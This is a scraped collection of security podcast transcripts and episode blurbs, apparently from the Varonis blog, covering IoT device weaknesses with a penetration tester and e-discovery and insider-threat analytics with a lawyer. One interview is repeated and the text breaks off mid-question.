Ken: No. It doesn't work like that …Yeah, that's the crazy bit. In the case of the WiFi kettle, it only works over WiFi. So you've got to be in your house!
IOS: Okay. It's even stranger.
Ken: Yeah, I don't know about you but my kitchen isn't very far away from the rest of my house. I'll just walk there, thanks.
IOS: Yeah. It seems that they were just so lacking in some basic security measures … they left some really key information unencrypted. What was the assumption? That it would be just used in your house and that it would be just impossible to someone to hack into it?
Ken: You're making a big step there, which is assuming that the manufacturer gave any thought to an attack from a hacker at all. I think that's one of the biggest issues right now is there are a lot of manufacturers here and they're rushing new product to market, which is great. I love the innovation.
I'm a geek. I like new tech. I like seeing the boundaries being pushed. But those companies that are rushing technologies to market with not really understanding the security risk. Otherwise, you're completely exposing people's homes, people's online lives by getting it wrong.
IOS: Right. I guess I was a little surprised. You mentioned in your blog something called wigle.net?
Ken: Yeah, wigle is …. awesome and that's why WiFi's such a dangerous place to go.
IOS: Right.
Ken: Well, there's other challenges. It's just the model of WiFi -- which is great, don't get me wrong -- when you go home with your cell phone, your phone connects to your WiFi network automatically, right?
Now, the reason I can do that is by sending what are called client probe requests. And that's your phone going, "Hey, WiFi router, are you there? Are you there? Are you there?"
Of course, when you're out and about and your WiFi's on, it doesn't see your home WiFi router. But when you get home, it goes, "Are you there?" "Yeah, I'm here," and it does the encryption and all your traffic's nice and safe.
What wigle does — I think it stands for wireless integrated geographic location engine, which is crazy … security researchers have been out with wireless sniffers, scanners, and mapped all the GPS coordinates of all the wireless devices they see.
And then they collate that onto wigle.net, which is a database of these which you can basically query a wireless network name … and work out where they are.
So it's really easy. You can track people using the WiFi on their phones using wigle.net. You can find WiFi devices. A great example of that was how we find the iKettle, that you can search wigle.net for kettles. It's crazy!
IOS: Yeah, I know. I was stunned. I had not seen this before. I suspect some of the manufacturers would be surprised if they saw this. We see the same thing in the enterprise space or IT. I'm just sort of surprised that's just so many tools and hacking tools out there.
But in any case, I think you mentioned that some of these devices start up as an access point and that, in that case, you know the default access name of the iKettle or whatever the device is, and then you could spot it.
Is this the way the hackers work?
Ken: No, that's right. The issue with an IoT WiFi device is that when you first put it up, you need to get through a process of connecting to it and connecting it to your home WiFi network.
And that is usually a two-stage process. Usually. It depends. Some devices don't do this but most devices, say, the iKettle, will set itself up as an access point first or a client-to-client device, and then once you go in and configure it with your cell phone, it then switches into becoming a client on your WiFi network. And it's going through that set of processes where we also found issues and that's where you can have some real fun.
IOS: Right. I think you took the firmware of one of these devices and then was able to figure out, let's say, like a default password.
Ken: Yeah. That's another way. It's a completely different attack. So that's not what we'll do in the iKettle. We didn't need to go near the firmware.
But a real game changer with IoT devices is that the manufacturer is putting their hardware in the hands of their customers … Let's say you're a big online retailer. Usually you bring them in with application and you buy stuff.
With the Internet of Things, you're actually putting your technology -- your kit, your hardware, your firmware, your software — into the hands of your consumers.
If you know what you're doing, there's great things you can do to analyze the firmware. You can extract off from devices, and going through that process, you can see lots of useful data. It's a real game changer, unlike a web application where you can protect it with a firewall … But the Internet of Things, you put your chips into the hands of your customers and they can do stuff with that potentially, if they have got security right.
IOS: Right. Did you talk about they should have encrypted the firmware or protected it in some way? Is that right?
Ken: Yeah. Again, that's good practice. In security, we talk about having layers of defense, what we call defense in depth so that if any one layer of the security chain is broken, it doesn't compromise the whole device.
And a great example for getting that right would be to make sure you protect the firmware. So you can digitally sign the code so that only valid code can be loaded onto your device. That's a very common problem in design where manufacturers haven't looked at code signing and therefore we can upload rogue code.
A good example of that was the Ring doorbell. Something that's attached to the outside of your house. You can unscrew it. You can walk off with it. And we found one bug whereby you can easily extract the WiFi key from the doorbell!
Again, the manufacturer fixed that really quickly, which is great, exactly what we want to see, but our next step is looking at it and seeing if we can take the doorbell, upload a rogue code to it, and then put it back on your door.
So we've actually got a back door on your network.
IOS: Right, I know. Very scary. Looking through your blog posts and there were a lot of consumer devices, but then there was one that was in a, I think, more of a borderline area and it was ironically a camera. It could potentially be a security camera. Was that the one where you got the firmware?
Ken: Yeah, that was an interesting one. We've been looking at some consumer grade CCTV cameras, although we see these in businesses as well. And we've particularly been looking at the cameras themselves and also the digital video recorders, the DVRs where they record their content onto.
So many times we find someone has accidentally put a CCTV camera on the public Internet. You've got a spy cam into somebody's organization! The DVR that records all the content, sometimes they put those on the Internet by mistake as well. Or you find the manufacturers built it so badly that .. it goes on by itself, which is just crazy.
IOS: Yeah, there's some stunning implications, just having an outsider look into your security camera. But you showed you were able to, from looking at the...it was either the firmware or once you got into the device, you could then get into network. Was that right?
Ken: Yeah, that's quite ironic really, isn't it? CCTV cams, you consider to be a security device. And what we found is not just the camera but also the DVR, if you put it on your network and ,,, it can create a backdoor onto your network as well. So you put on a security device that makes you less secure.
IOS: One of things you do in your assessments is wireless scanning and you use something, if I'm not mistaken, called Kismet?
Ken: Kismet's a bit old now ... There are lots of tools around but the Aircrack suites is probably where it's at right now And that's a really good suite for wireless scanning and wireless g cracking.
IOS: Right. So I was wondering if you could just describe how you do a risk assessment. What would be the procedure using that particular tool?
Ken: Sure. At its most basic, what you'd be looking to do, let's say you're looking at your home WiFi network. Basically, we need to make sure your WiFi is nice and safe. And security of a WiFi key is how long and complex it is.
It's very easy to grab an encrypted hash of your WiFi key by sitting outside with a WiFi antenna and a tool like Aircrack, which allows you to grab the key. What we then want to do is try and crack that offline. So once I've got your WiFi key, I'm on your network, and we find in a lot of cases that ISP WiFi routers, the default passwords just aren't complicated enough.
And we looked at some of the ISPs in the U.K. and discovered that some of the preset keys, we could crack them on relatively straight-forward equipment in as little as a couple of days.
IOS: Okay. That is kind of mind-blowing because I was under the impression that those keys were encrypted in a way that would make it really difficult to crack.
Ken: Yeah, you hope so but, again, it comes down to the length and complexity of the key. If you WiFi network key is only say -- I don't know — eight characters long and it's not really going to stand up to a concerted attack for very long. So again, length and complexity is really important.
IOS: Yeah, actually we do see the same thing in the enterprise world and one of the first recommendations security pros make is the keys have to be longer and the passwords have to be longer than at least 8.
Ken: We've been looking at some ... there's also the character set as well. We often find … the WiFi router often might only have lower case characters and maybe some numbers, and those numbers and characters are always in the same place in the key. And if you know where they are and you know they're always going to be lower case, you've reduced the complexity.
IOS: Right.
Ken: So I'd really like to be seeing 12-, 15-, 20-character passwords.
It's not a difficult thing. Every time you get a new smartphone or a new tablet, you have to go and get it from the router then but really I think people can cope with longer passwords that they don't use very often, don't you think?
IOS: No, I absolutely agree. We sort of recommend, and we've written about this, that you can...as an easy way to remember longer passwords, you can make up a mnemonic where each letter becomes part of a story. I don't know if you've heard of that technique.
You can get a 10-character password that's easy to remember and therefore becomes a lot harder to decrypt. We've also written a little bit about some of the decrypting tool that are just easily available, and I think you mentioned one of them.
Was it John the Ripper?
Ken: John is a password brute force tool and that's really useful. That's great for certain types of passwords. There are other tools for doing different types of password hashes but John is great. Yeah, it's been around for years.
IOS: It's still free.
Ken: But there are lots of other different types of tools that crack different types of password.
IOS: Okay. Do you get the sense that, just going back to some of these vendors who are making these devices, I think you said that they just probably are not even thinking about it and perhaps just not even aware of what's out there?
Ken: Yeah, let's think about it. The majority of start-up entrepreneur organizations that are trying to bring a new IoT device to market, they've probably got some funding. And if they're building something, it's probably going to be going into production nine months ahead.
Imagine you've got some funding from some investors, and just as you're about to start shipping, somebody finds a security bug in your product!
What do you do? Do you stop shipping and your company goes bust? Or do you carry on and trying to deal with the fallout?
I do sympathize with these organization, particularly if they had no one giving them any advice along the way to say, "Look, have you thought about security?" Because then they're backed into a corner. They've got no choice but to ship or their business goes bankrupt, and they've got no ability to fix the problem.
And that’s probably what happened with the guys who made the WiFi kettle. Some clever guys had a good idea, got themselves into a position where they were committed, and then someone finds a bug and there's no way of backing out of shipping.
IOS: Right, yeah. Absolutely all true. Although we like to preach something called Privacy by Design — at least it’s getting a lot more press than it did a couple years ago — which is just the people at the C-level suite should just be aware that you have to start building some of these privacy and security ideas into the software.
Although it's high-sounding language. And you're right, when it comes to it, a lot of companies, especially start-ups, are really going to be forced to push these products out and then send out an update later, I guess is the idea. Or not. I don't know.
Ken: That's the chance, isn't it?
So if you look at someone like Tesla, they've had some security bugs found last year and they have the ability to do over-the-Internet updates. So the cars can connect over WiFi and all their security bugs were fixed over the air in a two-week period!
I thought that was fantastic.
So they can update in the field ... if you figured out that, brilliant. But they don't have the ability to do updates once they're in the field. So then you end up in a real stick because you've got products you can only fix by recalling, which is a huge cost and terrible PR. So hats off to Tesla for doing it right.
And the same goes for the Ring doorbell. The guys thought about it. They had a process whereby it got the updates really, really easy, it's easy to fix, and they updated the bug that we found within about two weeks.
And that's the way it should be. They completely thought about security. They knew they couldn't be perfect from the beginning. "Let's put a cable in place, a mechanism, so we can fix anything that gets found in the field."
IOS: Yes. We're sort of on the same page. Varonis just sees the world where there will always be a way for someone to get into especially newer products and you have to have secondary defenses. And you've talked about some good remediations with longer passwords, and another one we like is two-factor authentication.
Any thoughts on biometric authentication?
Ken: Yes. Given the majority of IoT devices have being controlled by a smartphone, I think it's really key for organizations to think about how they've authenticated the customer to a smart device or, if they have a web app, the web interface as well, how they authenticate the customer to that.
I'm a big fan of two-factor authentication. People get their passwords stolen in breaches all the time. And because they will reuse their passwords across multiple different systems, passwords stolen from one place and you find another place gets compromised.
There was a great example, I think, some of the big data breaches ... they got a password stolen in one breach and then someone got their account hacked. It wasn't hacked. They just had reused the password!
IOS: Right.
Ken: So I'm a real fan of two-factor authentication to prevent that happening. Whether it's a one-time SMS to your phone or a different way of doing it, I think two-factor authentication is fantastic for helping Average Joe deal with security more easily. No one's going to have an issue with, "Look, you've sent me an SMS to my phone".
That's another layer of authentication. Great. Fantastic." I'm not so much a fan of biometrics by themselves and the reason for that is my concern about revocation. Just in case the biometric data is actually breached, companies get breached all the time, we've not just lost passwords because passwords we throw them away, we get new ones, but if we lose your biometic, we're in a bit more of a difficult position.
But I do biometrics work brilliantly when they're combined with things like passwords. Biometric plus password is fantastic as a secure authentication.
IOS: Thanks for listening to the podcast. If you're interested in following Ken on Twitter, his handle is TheKenMunroShow or you can follow his blog at PenTestPartners.com. Thanks again.
Since security pertains to everyone, in this episode of the IOSS we challenged ourselves to tie security back to Kevin Bacon. You might have to give us a few passes, but the connection is still strong.
Keira Knightley: Earlier this year, a man applied for credit account at Best Buy using Keira Knightley’s driver’s license information. If they didn’t catch him, it would have affected her FICO score.
And speaking of FICO, they just created an Enterprise Security Score, which rates how secure an organization is. We debated whether or not a score will improve security.
Chris Pine: Knightley was in Jack Ryan: Shadow Recruit with Pine. He worked undercover as a compliance officer at an investment firm.
If Pine was a compliance officer for a security firm that profited by tanking a medical device stock, I’m guessing he’d have to raise a red flag.
Harrison Ford – Ford also played the character, Jack Ryan in Clear and Present Danger, so Pine and Ford are practially the same person. But it was when he played a doctor in The Fugitive that caught our attention.
While Ford played a doctor who was framed for murder, recently a woman’s stolen identity almost landed her in jail. And we discussed the dangers of medical identity theft.
The Obamas – The Obamas invited Harrison Ford to the White House. It impressed us that the White House now has a CISO.
Tom Hanks – Hanks narrated Obama’s “ Road We Traveled”
Kevin Bacon – And lastly, Hanks and Bacon appeared in Apollo 13.
Listen in and join the fun!
The post Six Degrees of Kevin Bacon (Security Edition) – IOSS 24 appeared first on Varonis Blog.
In this second podcast, Bennett continues where he left off last time. Borden describes his work on developing algorithms to find insider threats based on analyzing content and metadata.
Andy: Thanks, Cindy. And again welcome, Bennett. Thank you for joining this call. So we're really excited to have you, and mostly because you have this unusual background that bridges law and data analysis. You've also written some really interesting articles on the subject of applying data science to e-discovery. I'm wondering for our non-lawyer readers of the blog, can you tell us what discovery is and how it has led to the use of big data techniques?
Bennett: Sure, absolutely. And Andy and Cindy, thanks for having me. So discovery is a process in litigation. And it's a process when two or more parties get into litigation. These rules about discovery require the parties to trade information about whatever the case is about.So if you think of a patent infringement case or a breach of contract case, the two parties ‘serve discovery’—that’s what it's called--on each other. This is basically a game of Go Fish. And one side says, "Give me all your documents about the formation of the contract," and then the other side has to go and find all those documents.
As you can imagine, in the information age, that could be anything!
You've got to go find all the emails about that and all the documents like Word or PowerPoint. Depending on the case, it could be things like server logs or financial or HR data. It becomes quite the hunt in this modern age.
Bennett: That's exactly right.Varonis: The problem is finding relevant documents. And this problem of finding relevancy and how to decide whether a document is relevant would seem to lead to some ideas in data science.
Bennett: Yes, and that's what's been really great about the advent of the information age and big data analytics in the last few years. Discovery has been around since the 1960's, but it was initially a paper endeavor. You had to go to file cabinets and file rooms and you'd find stuff, and copy it, and hand it over.But as we’ve gotten into computerized systems and databases and especially email, it's become really quite burdensome. Millions of dollars are spent trying to find and locate these documents. It began as an issue of search technology, having to search these different repositories, document management systems and file servers and email servers.
Then as data analytics came online, we have these advanced machine learning search capabilities. As I find something that I'm looking for, it's basically a “more like this” search, and analytical tools can help us understand the characteristics of what they call responsive documents and help us find more like that. It's greatly increased the efficiency of the discovery process.
Bennett: Yeah. This is really what's one of the most interesting parts of data science and its convergence in the legal sphere, because if you think about it, a lawyer's most fundamental product is really information.As a litigator, as a corporate lawyer, what we're trying to figure out is what happened and why: sometimes it’s whose fault it is or even trying to understand the value of a transaction or the value of a company, or the risk that's associated with certain kinds of securities transactions. All of that is based on information. The easier it is and the more accurately and quickly you can get at certainty of information, the better legal product you have.
We started playing with these techniques. It’s the same techniques that were helping us find information that was relevant to a case, and tried to apply these to different settings.
One of the most obvious is investigation settings, like a regulatory investigation or even an internal investigation. It's the same kind of principle, you're looking for electronic evidence of what happened. And that kind of pushed us into some interesting other areas.
If you think about how a merger or acquisition happens, company A wants to buy company B, and so company A asks a bunch of questions — what they call due diligence. They want to know what your assets and liabilities are, what risks you might face, what are your uncollectible accounts, and, say, do you have any kind of environmental risk or litigation going on.
The information provided by the target company is used to get an understanding of the value of the target, and that's what determines the purchase price. The more certain that information is or that value is, the fairer the price. When you start getting fluctuations in price, it really reflects the amount of uncertainty over the value of the company.
Often when these companies trade information, they don't have a clear picture of the other side. We started using these electronic discovery and big data techniques in the due diligence process to get clearer information.
Bennett: Yeah. And this is what's interesting! When we were talking to our M&A lawyers, as one of the endeavors, we were going around to different practice groups in the firm, and we were saying, "Look, I have this skill set where I can get you information. And so how would that be valuable to you?"One of the lawyers I was talking to, the head of the M&A group, said, ‘Look, our biggest problem is that we don't have about what they're telling us and how accurate it is.’
Every M&A transaction has a provision, which they call an indemnification provision, that basically says, ‘You're going to tell me about your company, and then I'm going to give you some money for the company, but if I find out that what you told me was not accurate, then to the extent it wasn't accurate, I get to adjust my purchase price after.’ In other words, I get a refund of whatever the differences in value are.
The problem with these indemnification provisions is that they are only open for like 30 or 60 days. Usually it's very hard to figure out whether the information is accurate within that very short period of time.
So in this particular case, our client, the purchaser, had some doubts about the veracity of some of the information coming out of the other side, but really couldn't prove one way or the other. Literally the day that the purchase closed, we owned all the information assets at the company we bought.
We swooped in and did a data analysis, looking at all the information they had given us, and then walked it back through time. How did they come up with these figures in their disclosures? What was the internal discussion going on with their internal people and their outside auditors?
We were able to show there was a pretty wide variance between what they told us and what is a reasonable basis for the valuation.
We got millions of dollars back on that purchase price, and we've been able to do that over and over again now because we are able to get at these answers much more quickly in electronic data.
We're definitely on the same page about there's a lot of information on file systems, and data science can help pull it out!
Back in December, we heard you speak at the CDO Summit here in New York City, and you also mentioned a system that you helped develop that can spot insider threats during and even before the actual incident. And I think you said you analyzed both the actual content and meta-content or metadata. Can you talk a little bit more about that system?
Bennett: Sure. You know, this is one of the most intriguing things that I think we've done. And it sprang out of this understanding that electronic data inside of a company, and really anywhere, is really evidence of where someone has been at a certain point in time, and what they thought or did or purchased or communicated. So you can actually watch how decisions are made or how actions start to be undertaken.All of us go through our everyday lives, especially at work, leaving trails behind of conversations with people, emails back and forth, and how we come to decisions. All of these things are now kept in this electronic record. We have this sociological record-- more than we've ever had as a species, really! If you know how to get at those facts and how to put them together, you can really find the answer to just about how anything came about.
I came out of the intelligence community before going to law school, and so figuring out what happened and why has been my background for my entire career.
What we figured out in data science is we are pretty good at being able to predict what people are going to do as consumers. For example, this is why your Amazon suggestions, your gift basket, or your Netflix suggestions on movies, or the coupons they spit out at the local pharmacy are based on predictions of what you’re going to do.
I thought if we can predict what someone's going to like or what someone's going to buy, surely I can predict if someone's going to do something wrong, because just like there's patterns in all human conduct, there's patterns in misconduct as well.
So we tested this. We took a number of data sets that we had basically found in a discovery process-- a litigation or a regulatory investigation that was about corporate misconduct, something like financial statement fraud-- and all of these documents had already been analyzed by teams of lawyers to figure out which ones of those were relevant to the underlying misconduct.
I had a target variable that a document was or was not related to the underlying misconduct.
We built algorithmic models, predictive models, based on these underlying data, across all sorts of different kinds of misconduct, and it turned out that misconduct is actually highly predictable.
We worked with some of my colleagues back at the intelligence agencies, some folks at the FBI, and some social scientists who worked with the psychology of fraud and the psychology of wrongdoing, and developed this algorithmic model that had aspects of text mining--- words and phrases people used.
Some of it was based on social network analysis—looking at who was talking to who, and when, or strange patterns in communication, especially outside of work hours, people that don't normally talk to each other, or siphoning off communications outside of the network to personal email accounts.
A significant part of this was conducting sentiment analysis. It turns out that the sentiment analysis actually was a large proportion of the predictive algorithm. After putting all of these features together into a model, it was stunningly accurate that we could find patterns as it began to develop, that people were either engaging in some kind of misconduct, or a situation was ripe where such misconduct could occur.
Bennett: Yes, that's exactly right. We looked specifically at the temporal aspect of misconduct. Catching someone after they've done it or kind of after the horse is out of the barn, that's easier, but what's harder is can we actually see the misconduct coming?So we built this model where we had a test set of data, some of which we used to build the model, and of course some of which we used to test it on, and we focused specifically on the behavior leading up to the misconduct. So could we catch it earlier?
And that's where it's really interesting to see the dynamics, the sociological dynamics of how a corporation works, and people's frustration level and feelings of acceptance and support--was there some kind of loyalty severancing event? It was really quite an interesting sociological effort.
Varonis: Absolutely, yeah. The researchers talk about trigger events that will push an insider over the line, so to speak. But we've also learned, as you suggested, that the insiders will actually try it out, they'll try to do some test runs to see how far they can get. And it sounds like your algorithms would then spot this. In other words, stop them before they actually do the act of copying or destruction or whatever it is.
Bennett: That's exactly it.
Varonis: Yeah. We call that user behavior analytics, or UBA. That's the industry term of it. So it sounds like you think that's the right approach. Not everyone follows that way of finding these behaviors, or catching insiders, I should say, but it sounds like behavior is something that you're very interested in spotting.
Bennett: It is. You know, it's fraught with very interesting issues. One of the things that I speak about quite often is the ethical use of data analytics. And there are certainly issues here. A lot of the triggering events or the triggers that come into misconduct situations have to do with people's personal lives, some kind of personal crisis or financial crisis, drug or alcohol dependencies, and a lot of it has to do with their interaction with their colleagues and superiors, stressful situations and feelings of ingratitude or not being recognized for their worth, and those are very personal things.And one of the things that we tested this on as part of a graduate program that I was involved in at New York University is what could you tweak this algorithm to find? We actually did some test runs. Could you find all the Republicans? Could you find people of a particular political belief or such? And you can!
And it's very disconcerting that to realize that these kinds of algorithms can really find just about anything. So then the question becomes, "What's the right thing to do?"
What responsibility do we have as a company or especially a public company to monitor behavior and to monitor compliance, and yet not interfere with people's personal lives? It's a very interesting question that the law is really not settled on, and is something that we have to consider as data analysts.
Varonis: Yeah, that's very interesting. The question is, "When do you turn it on?" Should it be on all the time or do certain conditions justify it? So yeah, I absolutely agree that is an issue for companies.
I have one last question for you, and it has to do with, again, the insiders let's say who go bad, they're in a powerful position, they actually have created the content, they feel like they own it.
And these people are sometimes very hard to spot because they're the creators, they could be high level executives, they own the content, and sometimes hard to determine whether they've actually done something wrong.
They may be copying a lot of directories or files to a laptop, but that's just part of their job. So we are big believers in just keeping some basic audit trails on file activities, outside of any of the algorithms that we were talking about. So do you think that is just a minimal thing for companies to do?
Bennett: It is. It's interesting because it's why we built the algorithms to capture so many different kinds of behaviors so that one person could not hide their trail well enough. But there's just basic things the companies should do to understand where their most valuable information is and where it's going. There is very simple technology out there that allows us to understand where valuable information is being routed and where it goes to that are far away from these kind of advanced algorithms.So it's common sense. In the Information Age a company's most valuable asset really is information. And so having what we call information governance principles, and so understanding and governing your information as you would any other asset is just good business.
Varonis: Right, absolutely agree.
So thank you so much, Bennett, on your insights today. Bennett, if people want to learn more about what you do and follow you on Twitter, do you have a handle or a website that you can share with everyone?
Bennett: Yes, thanks. My handle is @BennettBorden. And then most of my publications are on the firm's webpage at DrinkerBiddle.com under my profile. We write fairly often on this, and I would certainly welcome any thoughts from your listeners.
When it comes to ransomware, we can’t stop talking about it. There’s a wonderful phrase for our syndrome, “the attraction of repulsion,” meaning that something is so awful you can’t stop watching and/or talking about it.
How awful has ransomware been? According to the FBI, in the first three months of 2016, ransomware attacks cost their victims a total of $209 million. And it doesn’t stop there. It’s impacted many businesses including financial firms, government organizations, healthcare providers, and more.
In this episode of the Inside Out Security Show(IOSS), we cover three types of ransomware: CryLocker(impersonates the US government), FairWare(targets Linux users), and yes, fake ransomware.
While some might disagree on whether or not to pay the ransom, we can all agree that ransomware is the canary in the coal mine.
The post Attraction of Repulsion (to Ransomware) – IOSS 23 appeared first on Varonis Blog.
Once we heard Bennett Borden, a partner at the Washington law firm of DrinkerBiddle, speak at the CDO Summit about data science, privacy, and metadata, we knew we had to reengage him to continue the conversation.
His bio is quite interesting: in addition to being a litigator, he’s also a data scientist. He’s a sought after speaker on legal tech issues. Bennett has written law journal articles about the application of machine learning and document analysis to ediscovery and other legal transactions.
In this first part in a series of podcasts, Bennett discusses the discovery process and how data analysis techniques came to be used by the legal world. His unique insights on the value of the file system as a knowledge asset as well as his perspective as an attorney made for a really interesting discussion.
Andy: Thanks, Cindy. And again welcome, Bennett. Thank you for joining this call. So we're really excited to have you, and mostly because you have this unusual background that bridges law and data analysis. You've also written some really interesting articles on the subject of applying data science to e-discovery. I'm wondering for our non-lawyer readers of the blog, can you tell us what discovery is and how it has led to the use of big data techniques?
Bennett: Sure, absolutely. And Andy and Cindy, thanks for having me. So discovery is a process in litigation. And it's a process when two or more parties get into litigation. These rules about discovery require the parties to trade information about whatever the case is about.So if you think of a patent infringement case or a breach of contract case, the two parties ‘serve discovery’—that’s what it's called--on each other. This is basically a game of Go Fish. And one side says, "Give me all your documents about the formation of the contract," and then the other side has to go and find all those documents.
As you can imagine, in the information age, that could be anything!
You've got to go find all the emails about that and all the documents like Word or PowerPoint. Depending on the case, it could be things like server logs or financial or HR data. It becomes quite the hunt in this modern age.
Bennett: That's exactly right.Varonis: The problem is finding relevant documents. And this problem of finding relevancy and how to decide whether a document is relevant would seem to lead to some ideas in data science.
Bennett: Yes, and that's what's been really great about the advent of the information age and big data analytics in the last few years. Discovery has been around since the 1960's, but it was initially a paper endeavor. You had to go to file cabinets and file rooms and you'd find stuff, and copy it, and hand it over.But as we’ve gotten into computerized systems and databases and especially email, it's become really quite burdensome. Millions of dollars are spent trying to find and locate these documents. It began as an issue of search technology, having to search these different repositories, document management systems and file servers and email servers.
Then as data analytics came online, we have these advanced machine learning search capabilities. As I find something that I'm looking for, it's basically a “more like this” search, and analytical tools can help us understand the characteristics of what they call responsive documents and help us find more like that. It's greatly increased the efficiency of the discovery process.
Bennett: Yeah. This is really what's one of the most interesting parts of data science and its convergence in the legal sphere, because if you think about it, a lawyer's most fundamental product is really information.As a litigator, as a corporate lawyer, what we're trying to figure out is what happened and why: sometimes it’s whose fault it is or even trying to understand the value of a transaction or the value of a company, or the risk that's associated with certain kinds of securities transactions. All of that is based on information. The easier it is and the more accurately and quickly you can get at certainty of information, the better legal product you have.
We started playing with these techniques. It’s the same techniques that were helping us find information that was relevant to a case, and tried to apply these to different settings.
One of the most obvious is investigation settings, like a regulatory investigation or even an internal investigation. It's the same kind of principle, you're looking for electronic evidence of what happened. And that kind of pushed us into some interesting other areas.
If you think about how a merger or acquisition happens, company A wants to buy company B, and so company A asks a bunch of questions — what they call due diligence. They want to know what your assets and liabilities are, what risks you might face, what are your uncollectible accounts, and, say, do you have any kind of environmental risk or litigation going on.
The information provided by the target company is used to get an understanding of the value of the target, and that's what determines the purchase price. The more certain that information is or that value is, the fairer the price. When you start getting fluctuations in price, it really reflects the amount of uncertainty over the value of the company.
Often when these companies trade information, they don't have a clear picture of the other side. We started using these electronic discovery and big data techniques in the due diligence process to get clearer information.
Bennett: Yeah. And this is what's interesting! When we were talking to our M&A lawyers, as one of the endeavors, we were going around to different practice groups in the firm, and we were saying, "Look, I have this skill set where I can get you information. And so how would that be valuable to you?"One of the lawyers I was talking to, the head of the M&A group, said, ‘Look, our biggest problem is that we don't have about what they're telling us and how accurate it is.’
Every M&A transaction has a provision, which they call an indemnification provision, that basically says, ‘You're going to tell me about your company, and then I'm going to give you some money for the company, but if I find out that what you told me was not accurate, then to the extent it wasn't accurate, I get to adjust my purchase price after.’ In other words, I get a refund of whatever the differences in value are.
The problem with these indemnification provisions is that they are only open for like 30 or 60 days. Usually it's very hard to figure out whether the information is accurate within that very short period of time.
So in this particular case, our client, the purchaser, had some doubts about the veracity of some of the information coming out of the other side, but really couldn't prove one way or the other. Literally the day that the purchase closed, we owned all the information assets at the company we bought.
We swooped in and did a data analysis, looking at all the information they had given us, and then walked it back through time. How did they come up with these figures in their disclosures? What was the internal discussion going on with their internal people and their outside auditors?
We were able to show there was a pretty wide variance between what they told us and what is a reasonable basis for the valuation.
We got millions of dollars back on that purchase price, and we've been able to do that over and over again now because we are able to get at these answers much more quickly in electronic data.
We're definitely on the same page about there's a lot of information on file systems, and data science can help pull it out!
Back in December, we heard you speak at the CDO Summit here in New York City, and you also mentioned a system that you helped develop that can spot insider threats during and even before the actual incident. And I think you said you analyzed both the actual content and meta-content or metadata. Can you talk a little bit more about that system?
Bennett: Sure. You know, this is one of the most intriguing things that I think we've done. And it sprang out of this understanding that electronic data inside of a company, and really anywhere, is really evidence of where someone has been at a certain point in time, and what they thought or did or purchased or communicated. So you can actually watch how decisions are made or how actions start to be undertaken.All of us go through our everyday lives, especially at work, leaving trails behind of conversations with people, emails back and forth, and how we come to decisions. All of these things are now kept in this electronic record. We have this sociological record-- more than we've ever had as a species, really! If you know how to get at those facts and how to put them together, you can really find the answer to just about how anything came about.
I came out of the intelligence community before going to law school, and so figuring out what happened and why has been my background for my entire career.
What we figured out in data science is we are pretty good at being able to predict what people are going to do as consumers. For example, this is why your Amazon suggestions, your gift basket, or your Netflix suggestions on movies, or the coupons they spit out at the local pharmacy are based on predictions of what you’re going to do.
I thought if we can predict what someone's going to like or what someone's going to buy, surely I can predict if someone's going to do something wrong, because just like there's patterns in all human conduct, there's patterns in misconduct as well.
So we tested this. We took a number of data sets that we had basically found in a discovery process-- a litigation or a regulatory investigation that was about corporate misconduct, something like financial statement fraud-- and all of these documents had already been analyzed by teams of lawyers to figure out which ones of those were relevant to the underlying misconduct.
I had a target variable that a document was or was not related to the underlying misconduct.
We built algorithmic models, predictive models, based on these underlying data, across all sorts of different kinds of misconduct, and it turned out that misconduct is actually highly predictable.
We worked with some of my colleagues back at the intelligence agencies, some folks at the FBI, and some social scientists who worked with the psychology of fraud and the psychology of wrongdoing, and developed this algorithmic model that had aspects of text mining--- words and phrases people used.
Some of it was based on social network analysis—looking at who was talking to who, and when, or strange patterns in communication, especially outside of work hours, people that don't normally talk to each other, or siphoning off communications outside of the network to personal email accounts.
A significant part of this was conducting sentiment analysis. It turns out that the sentiment analysis actually was a large proportion of the predictive algorithm. After putting all of these features together into a model, it was stunningly accurate that we could find patterns as it began to develop, that people were either engaging in some kind of misconduct, or a situation was ripe where such misconduct could occur.
Bennett: Yes, that's exactly right. We looked specifically at the temporal aspect of misconduct. Catching someone after they've done it or kind of after the horse is out of the barn, that's easier, but what's harder is can we actually see the misconduct coming?So we built this model where we had a test set of data, some of which we used to build the model, and of course some of which we used to test it on, and we focused specifically on the behavior leading up to the misconduct. So could we catch it earlier?
And that's where it's really interesting to see the dynamics, the sociological dynamics of how a corporation works, and people's frustration level and feelings of acceptance and support--was there some kind of loyalty severancing event? It was really quite an interesting sociological effort.
Varonis: Absolutely, yeah. The researchers talk about trigger events that will push an insider over the line, so to speak. But we've also learned, as you suggested, that the insiders will actually try it out, they'll try to do some test runs to see how far they can get. And it sounds like your algorithms would then spot this. In other words, stop them before they actually do the act of copying or destruction or whatever it is.
Bennett: That's exactly it.
Varonis: Yeah. We call that user behavior analytics, or UBA. That's the industry term of it. So it sounds like you think that's the right approach. Not everyone follows that way of finding these behaviors, or catching insiders, I should say, but it sounds like behavior is something that you're very interested in spotting.
Bennett: It is. You know, it's fraught with very interesting issues. One of the things that I speak about quite often is the ethical use of data analytics. And there are certainly issues here. A lot of the triggering events or the triggers that come into misconduct situations have to do with people's personal lives, some kind of personal crisis or financial crisis, drug or alcohol dependencies, and a lot of it has to do with their interaction with their colleagues and superiors, stressful situations and feelings of ingratitude or not being recognized for their worth, and those are very personal things.And one of the things that we tested this on as part of a graduate program that I was involved in at New York University is what could you tweak this algorithm to find? We actually did some test runs. Could you find all the Republicans? Could you find people of a particular political belief or such? And you can!
And it's very disconcerting that to realize that these kinds of algorithms can really find just about anything. So then the question becomes, "What's the right thing to do?"
What responsibility do we have as a company or especially a public company to monitor behavior and to monitor compliance, and yet not interfere with people's personal lives? It's a very interesting question that the law is really not settled on, and is something that we have to consider as data analysts.
Varonis: Yeah, that's very interesting. The question is, "When do you turn it on?" Should it be on all the time or do certain conditions justify it? So yeah, I absolutely agree that is an issue for companies.
I have one last question for you, and it has to do with, again, the insiders let's say who go bad, they're in a powerful position, they actually have created the content, they feel like they own it.
And these people are sometimes very hard to spot because they're the creators, they could be high level executives, they own the content, and sometimes hard to determine whether they've actually done something wrong.
They may be copying a lot of directories or files to a laptop, but that's just part of their job. So we are big believers in just keeping some basic audit trails on file activities, outside of any of the algorithms that we were talking about. So do you think that is just a minimal thing for companies to do?
